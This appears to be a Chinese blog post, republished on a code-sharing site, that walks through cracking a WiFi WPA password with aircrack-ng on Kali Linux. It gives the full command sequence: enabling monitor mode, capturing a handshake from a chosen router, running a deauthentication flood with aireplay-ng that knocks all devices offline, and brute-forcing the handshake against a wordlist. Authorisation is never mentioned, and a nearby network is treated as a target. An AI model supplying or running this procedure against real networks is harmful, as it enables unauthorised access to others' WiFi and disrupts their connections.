码迷,mamicode.com
首页 > 其他好文 > 详细

Kali aircrack-ng wifi密码破解(暴力)

时间:2018-03-19 19:08:27      阅读:1098      评论:0      收藏:0      [点我收藏+]

标签:dump   无法   ali   命令   AC   目录   解析   芯片   div   

1.kali linux安全渗透

技术分享图片

 

2.工具aircrack-ng

技术分享图片

 

3.ifconfig查看你的网卡信息,wlan0即无线网卡,注意,如果没有发现网卡可能是芯片不能被识别,建议选择网卡芯片为3037或rtl8187l的。

技术分享图片

 

4。看到这个界面后输入airmon-ng start wlan0(启动网卡监听模式)

技术分享图片

 

5.启动后ifconfig查看一下,如果网卡名变成了wlan0mon了,则表示操作成功。

技术分享图片

 

6.扫描附近wifi

airodump-ng wlan0mon

技术分享图片

参数详解:

BSSID: MAC地址

PWR:信号强度,越小信号越强。

#Data:传输的数据, 数据越大对我们越有利, 大的夸张的可能在看电影

CH:信号频道

ESSID:wifi名称

抓包开始

(比如我要抓的是这个)

技术分享图片

 

 

7.然后输入命令:

airodump-ng -c 11 --bssid 2E:E9:D3:28:59:EB -w /home/chenglee/2018/ wlan0mon

 

 

 解析:

-c代表频道, 后面带的是频道

bssid: mac地址(物理地址)

-w代表目录(抓到的握手包放在这个目录下面)

wlan0mon: 网卡名称

一直跑吖跑, 它的数据是不停刷新变化的...

这时候应该做点什么了,利用deauth洪水攻击,取消目标路由和所有设备的无线连接,这时候设备重新连接时,会抓取他的握手包,然后用字典进行爆破.

新开一个窗口观察

 

ps:如果无法获取包,攻击路由器进行断网重新连接

输入:aireplay-ng -0 0 -a 2E:E9:D3:28:59:EB  wlan0mon

 

技术分享图片

 

这时候目标路由已经断网,如果抓到包记得ctrl+c关掉这里,否则一直断网就成恶作剧了。这时返回你抓包的那个窗口,如果右上角出现handshake这样的信息(看下图),这说明抓包已经成功。

 

技术分享图片

 

 

可以进去目录看一下

技术分享图片

 

8.破解

输入:aircrack-ng -w /home/chenglee/dictionary/wpa.txt /home/chenglee/2018/-01.cap

 

 

解析:

-w后面接的是字典

-01.cap是握手包

也许过程会有点长, 这个得看密码复杂的与字典的好坏。

 

技术分享图片

 

Kali aircrack-ng wifi密码破解(暴力)

标签:dump   无法   ali   命令   AC   目录   解析   芯片   div   

原文地址:https://www.cnblogs.com/chenlove/p/8603798.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!